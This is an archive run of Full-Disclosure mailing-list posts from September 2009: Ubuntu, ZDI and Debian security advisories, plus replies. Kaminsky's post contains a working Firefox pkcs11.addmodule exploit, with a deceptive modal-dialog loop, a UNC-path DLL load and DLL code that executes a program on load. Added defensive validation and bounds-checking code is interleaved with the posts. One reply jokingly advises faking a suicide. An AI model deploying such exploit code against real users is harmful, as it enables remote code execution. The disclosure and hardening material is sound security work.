  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.8.10.1

Ubuntu 9.04:
  abrowser3.0.14+build2+nobinonly-0ubuntu0.9.04.1
  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.9.04.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.9.04.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

Several flaws were discovered in the Firefox browser and JavaScript
engines. If a user were tricked into viewing a malicious website, a remote
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2009-3070,
CVE-2009-3071, CVE-2009-3072, CVE-2009-3074, CVE-2009-3075)

Jesse Ruderman and Dan Kaminsky discovered that Firefox did not adequately
inform users when security modules were added or removed via PKCS11. If
a user visited a malicious website, an attacker could exploit this to
trick the user into installing a malicious PKCS11 module. (CVE-2009-3076)

It was discovered that Firefox did not properly manage memory when using
XUL tree elements. If a user were tricked into viewing a malicious website,
a remote attacker could cause a denial of service or possibly execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2009-3077)

Juan Pablo Lopez Yacubian discovered that Firefox did not properly display
certain Unicode characters in the location bar and other text fields when
using a certain non-Ubuntu font. If a user configured Firefox to use this
font, an attacker could exploit this to spoof the location bar, such as in
a phishing attack. (CVE-2009-3078)

It was discovered that the BrowserFeedWriter in Firefox could be subverted
to run JavaScript code from web content with elevated chrome privileges.
If a user were tricked into viewing a malicious website, an attacker could
exploit this to execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-3079)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:   106290 9e9affc499213399a986fa8accd06a9a

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2781 1169bce3f68552493e1bc47f7679a585

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly.orig.tar.gz
  Size/MD5: 11623385 f575ddd6c1d07a896c87e3aabdb6a96b

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:79438 b5a4f3597dd4e38a305a3171d1927522

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2832 fe9542586e0aeed4db98bc9754010c84

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly.orig.tar.gz
  Size/MD5: 40829392 ddbc45f0308e28dd3b0c402a4b5a360c

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66394 72174ccf649aa8d461cd332d7dbabbdf

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66398 9c920413fec6a6b06c750e347c1c0c8c

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66370 13f3b6d7fdc28e9fc9baca59b29d82ac

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66350 bf069a0aa9392565372db2769e861592

http://

Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-10 Thread webDEViL
This particularly came in handy when we had those cable connections
widespread. Basically this has been there since the time rediff started.



Sent from my iPhone

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

2009-09-10 Thread T Biehn
MrX,
Dude.
Just fake your own suicide. This old school trick will solicit the
feds to your locale if you're actually being watched.

Other advice?

I want voice recordings, jpegs, vlog posts, else it didn't happen &
you're schizoid.

-Travis

On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
 wrote:
> TheLearner wrote:
>
> <>
>> What would you do?
>
> I'm not sure what _I_ would do facing such a crisis, but I think the
> best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
> (s/he has been posting to this list lately, so should be easy to track
> down), and then get those two uber hackers to help as well -- they'll
> be much more help _to you_ than any private eye ever will...
>
>
>
> Regards,
>
> Nick FitzGerald
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

2009-09-10 Thread mrx
We have a code 4 on that 10-103m

regards
the real MrX



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Firefox <3.0.14 Multiplatform RCE via pkcs11.addmodule

2009-09-10 Thread Dan Kaminsky
Fix announce:
http://www.mozilla.org/security/announce/2009/mfsa2009-48.html
Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628

So, Firefox up through 3.0.13 had an obscure little function under
window.pkcs11:

 long  addmodule(in DOMString moduleName,
 in DOMString libraryFullPath,
 in long cryptoMechanismFlags,
 in long cipherFlags);

Yes, that's actually the full path to a DLL -- or an .so on Linux/OSX --
from a JS function that's exposed to the web.

Attacker doesn't get zero click install -- there's a dialog -- but:

1) Attacker does get to customize the dialog via moduleName
2) The dialog is modal, so the user doesn't get access to Firefox again
until they hit OK (can't even close Firefox)
3) On Windows, he can put a UNC path in for the Library path.  There's
probably similar on OSX and some Linux distros.  Even without, there's
usually a way to get a file in a known location -- see John Heasman's Java
work.

LoadLibrary of Attacker library on OK.

Repro:

<script>
  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
            "Please click 'OK' to repair.";

  // Keep re-prompting until addmodule returns -5; the dialog is modal,
  // so the user gets no Firefox back until they click OK.
  var ret = -2;
  while (ret != -5) {
     ret = window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n",
                                   "\\\\127.0.0.1\\c$\\pkunkcs", 0, 0);
  }
</script>
"Shellcode" is just a DLL with ShellExecute in the constructor:

CpkunkcsApp::CpkunkcsApp()
{
    // Runs as soon as LoadLibrary maps the DLL; here it just pops calc.exe.
    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;

    len = strlen(str) + 1;                  // include the terminating NUL

    wText = new wchar_t[len];               // was strlen(str): one wchar_t short of the memset below
    memset(wText, 0, len * sizeof(wchar_t));

    ::MultiByteToWideChar(CP_ACP, 0, str, -1, wText, (int)len);

    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);

    delete[] wText;
}

Cheers to Jesse Ruderman, who recognized this was probably not the greatest
of APIs some time ago.  The bug history is worth taking a look at... goes
back a while.  They missed the UNC path vector, and appear to have
underestimated the modal dialog.
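As an added example (not code from the post, from Mozilla or from Firefox), the checks a module-loading API exposed to web content would want in front of LoadLibrary, covering the two gaps the post describes: a free-form library path (UNC paths included) and free-form dialog text. The allow-listed directory, the reason strings and the dialog wording are constructed for illustration:

```python
"""Added example (not code from the post or from Mozilla): the checks a
'load a security module from a caller-supplied path' API would want in front
of LoadLibrary, covering the two gaps the post describes, a free-form library
path and free-form dialog text. ALLOWED_MODULE_DIR and the reason strings are
constructed for illustration."""
import ntpath
import re
from typing import Tuple

# Constructed allow-list: the only directory a page may name a module in.
ALLOWED_MODULE_DIR = r"C:\Program Files\Mozilla Firefox\pkcs11"

_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def is_unc_or_device_path(path: str) -> bool:
    r"""\\server\share, //server/share, \\?\... and \\.\... all start with two
    separators; each makes LoadLibrary fetch code from a remote host or a raw
    device instead of a locally installed file."""
    return path.replace("/", "\\").startswith("\\\\")


def validate_library_path(library_full_path: str) -> Tuple[bool, str]:
    """Accept only an absolute local path that resolves inside ALLOWED_MODULE_DIR."""
    if not library_full_path or _CONTROL_CHARS.search(library_full_path):
        return False, "empty path or control characters"
    if is_unc_or_device_path(library_full_path):
        return False, "UNC or device path"
    drive, tail = ntpath.splitdrive(library_full_path)
    if not drive or not tail.startswith(("\\", "/")):
        # Relative and drive-relative paths resolve against process state the
        # page does not see; a page should not get to pick the search order.
        return False, "path is not absolute"
    resolved = ntpath.normpath(library_full_path)   # collapses . and ..
    base = ntpath.normpath(ALLOWED_MODULE_DIR)
    # Trailing separator so that ...\pkcs11evil\x.dll is not taken for ...\pkcs11\.
    if not (resolved.lower() + "\\").startswith(base.lower() + "\\"):
        return False, "outside allow-listed module directory"
    if resolved.lower() == base.lower():
        return False, "path names the directory, not a module"
    return True, "ok"


def sanitize_dialog_text(module_name: str, max_len: int = 64) -> str:
    """Collapse moduleName to one short line so a page cannot pad the
    confirmation dialog with newlines and push the path and the browser's own
    warning out of view."""
    one_line = " ".join(_CONTROL_CHARS.sub(" ", module_name).split())
    if len(one_line) > max_len:
        one_line = one_line[: max_len - 3] + "..."
    return one_line


def build_confirmation(module_name: str, library_full_path: str) -> str:
    """Fixed browser wording with the caller-supplied values delimited, or a
    refusal before any dialog is shown."""
    ok, reason = validate_library_path(library_full_path)
    if not ok:
        return "REFUSED: " + reason
    name = sanitize_dialog_text(module_name)
    return (f'A web page wants to install the security module "{name}"\n'
            f"from: {library_full_path}\nInstall?")
```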

[Full-disclosure] ZDI-09-063: Apple QuickTime H.264 Nal Unit Length Heap Overflow Vulnerability

2009-09-10 Thread ZDI Disclosures
ZDI-09-063: Apple QuickTime H.264 Nal Unit Length Heap Overflow
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-063
September 10, 2009

-- CVE ID:
CVE-2009-2799

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8435.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists during the parsing of samples from a malformed
MOV file utilizing the H.264 codec. While parsing data to render the
stream, the application will mistrust a length that is used to
initialize a heap chunk that was allocated in a header. If the length is
larger than the size of the chunk allocated, then a memory corruption
will occur leading to code execution under the context of the currently
logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3859

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/



[Full-disclosure] ZDI-09-064: Apple QuickTime FlashPix Sector Size Overflow Vulnerability

2009-09-10 Thread ZDI Disclosures
ZDI-09-064: Apple QuickTime FlashPix Sector Size Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-064
September 10, 2009

-- CVE ID:
CVE-2009-2798

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8414.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists during the parsing of malformed FlashPix (.fpx)
files. While parsing the SectorShift and cSectFat fields from the
header, the application will multiply 2 user-controlled 32-bit values
and utilize this for an allocation. If the result of the multiplication
is greater than 32 bits, the application will allocate an undersized heap
chunk. Later, the application will copy file data directly into this
buffer leading to a buffer overflow which can allow for code execution
under the context of the currently logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3859

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

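As an added example (not Apple's or ZDI's code), the two missing size checks these QuickTime advisories describe, beside the computation they guard: ZDI-09-064's 32-bit product of two header fields feeding an allocation, and ZDI-09-063's per-sample NAL unit length copied into a chunk sized from a header without any comparison. The exact formula, the 4-byte NAL length prefix and the sample bytes are assumptions constructed for the example, not details from the advisories:

```c
/* Added example (not Apple's or ZDI's code): the two size checks missing in
 * ZDI-09-063 (NAL unit length vs. header-sized chunk) and ZDI-09-064
 * (32-bit product of two header fields used for an allocation). Field names
 * follow the advisories; the formula and the 4-byte NAL length prefix are
 * assumptions about the formats, not details taken from the advisories. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* ZDI-09-064 shape: sector size (1 << SectorShift) times cSectFat, multiplied
 * in 32 bits. 0x10000 * 0x10000 wraps to 0, so the allocator is handed an
 * undersized chunk and the later copy of file data overruns it.
 * (1u << shift is undefined for shift >= 32; left as-is, it is the bug.) */
uint32_t fat_alloc_size_unchecked(uint32_t sector_shift, uint32_t csect_fat)
{
    return (1u << sector_shift) * csect_fat;    /* product silently wraps */
}

/* Hardened: widen before multiplying and refuse anything the 32-bit size the
 * allocator is handed cannot represent. Returns 0 to mean "reject". */
uint32_t fat_alloc_size_checked(uint32_t sector_shift, uint32_t csect_fat)
{
    if (sector_shift >= 32 || csect_fat == 0)
        return 0;                               /* unrepresentable shift / empty FAT */
    uint64_t bytes = (uint64_t)(1u << sector_shift) * csect_fat;
    return bytes > UINT32_MAX ? 0 : (uint32_t)bytes;
}

/* ZDI-09-063 shape: walk a sample laid out as [4-byte big-endian length]
 * [NAL unit]... and copy each unit into a chunk of `cap` bytes, where cap was
 * decided earlier by a header. Returns the unit count, or -1 at the first
 * length that does not agree with the sample or the chunk. */
int parse_avc_sample(const uint8_t *sample, size_t sample_len, uint32_t cap)
{
    uint8_t *chunk = malloc(cap ? cap : 1);    /* the header-sized chunk */
    uint32_t used = 0;
    int count = 0;
    size_t pos = 0;
    while (pos < sample_len) {
        if (sample_len - pos < 4) { count = -1; break; }        /* truncated prefix */
        uint32_t nal_len = ((uint32_t)sample[pos] << 24) | ((uint32_t)sample[pos + 1] << 16)
                         | ((uint32_t)sample[pos + 2] << 8) | sample[pos + 3];
        pos += 4;
        /* The two comparisons the vulnerable parser skipped: the declared
         * length must fit the bytes left in the sample AND the room left in
         * the chunk. Without the second one, memcpy runs off the heap chunk. */
        if (nal_len > sample_len - pos || nal_len > cap - used) { count = -1; break; }
        memcpy(chunk + used, sample + pos, nal_len);
        used += nal_len;
        pos += nal_len;
        count++;
    }
    free(chunk);
    return count;
}

/* Constructed samples: two well-formed 3-byte NAL units, and one whose prefix
 * claims 0x1000 bytes while only 3 follow (the ZDI-09-063 shape). */
const uint8_t GOOD_SAMPLE[] = { 0,0,0,3, 0x65,0x88,0x84,  0,0,0,3, 0x41,0x9a,0x00 };
const uint8_t BAD_SAMPLE[]  = { 0,0,0x10,0x00, 0x65,0x88,0x84 };
```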


[Full-disclosure] ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability

2009-09-10 Thread ZDI Disclosures
ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-065
September 10, 2009

-- CVE ID:
CVE-2009-3077

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8442.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists during the redrawing of tree columns contained
within a XUL document. Due to the reuse of a previously freed object,
attacker controlled memory can be executed. Successful exploitation of
this vulnerability can lead to remote compromise of the affected system
under the credentials of the currently logged in user.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2009/mfsa2009-49.html

-- Disclosure Timeline:
2009-07-28 - Vulnerability reported to vendor
2009-09-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-10 Thread awf awf

And?  Every web application sends passwords as plain text unless they are using 
SSL.  Pretty much any "encryption" that they may do client side that isn't SSL 
is meaningless.  I hardly see how being able to sniff passwords from a site 
that isn't using SSL is big news.


Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-10 Thread Dan Kaminsky
Beyond that, most web applications that do use SSL, still forget to set
their cookies to secure (see
http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ).  Not to
mention the hordes of sites that have SSL logins off HTTP pages.  Even the
oft-repeated "well, the attacker won't get the plaintext password" claim
falls to the attacker who inserts some screen or keyboard sniffing JS into
the login page.

That being said, there probably is some class of attacker that can only do
passive monitoring as opposed to active interception.  But it's not exactly
a quantization to hang one's hat on.


On Thu, Sep 10, 2009 at 5:36 PM, awf awf  wrote:

>  And?  Every web application sends passwords as plain text unless they are
> using SSL.  Pretty much any "encryption" that they may do client side that
> isn't SSL is meaningless.  I hardly see how being able to sniff passwords
> from a site that isn't using SSL is big news.
>
>

[Full-disclosure] Friday the 11th of September 2009

2009-09-10 Thread full-censorship
Dan Kaminsky appears on full-disclosure mailing list and disses 
other people while his domain is still offline because of zf0.



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-10 Thread dramacrat
fuck.kaminsky

2009/9/11 Dan Kaminsky 

> Beyond that, most web applications that do use SSL, still forget to set
> their cookies to secure (see
> http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ).  Not to
> mention the hordes of sites that have SSL logins off HTTP pages.  Even the
> oft-repeated "well, the attacker won't get the plaintext password" claim
> falls to the attacker who inserts some screen or keyboard sniffing JS into
> the login page.
>
> That being said, there probably is some class of attacker that can only do
> passive monitoring as opposed to active interception.  But it's not exactly
> a quantization to hang one's hat on.
>
>
>  On Thu, Sep 10, 2009 at 5:36 PM, awf awf  wrote:
>
>>  And?  Every web application sends passwords as plain text unless they
>> are using SSL.  Pretty much any "encryption" that they may do client side
>> that isn't SSL is meaningless.  I hardly see how being able to sniff
>> passwords from a site that isn't using SSL is big news.
>>
>

[Full-disclosure] [SECURITY] [DSA 1878-2] New devscripts packages fix regressions

2009-09-10 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1878-2                    secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
September 11, 2009                    http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package: devscripts
Vulnerability  : missing input sanitation
Problem type   : remote
Debian-specific: yes
CVE Id(s)  : CVE-2009-2946

This update corrects regressions introduced by the devscripts security
update, DSA-1878-1.  The original announcement was:

Raphael Geissert discovered that uscan, a program to check for
availability of new source code versions which is part of the
devscripts package, runs Perl code downloaded from potentially
untrusted sources to implement its URL and version mangling
functionality.  This update addresses this issue by reimplementing the
relevant Perl operators without relying on the Perl interpreter,
trying to preserve backwards compatibility as much as possible.

For the old stable distribution (etch), this problem has been fixed in
version 2.9.26etch5.

For the stable distribution (lenny), this problem has been fixed in
version 2.10.35lenny7.

For the unstable distribution (sid), this problem will be fixed in
version 2.10.55.

We recommend that you upgrade your devscripts package.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

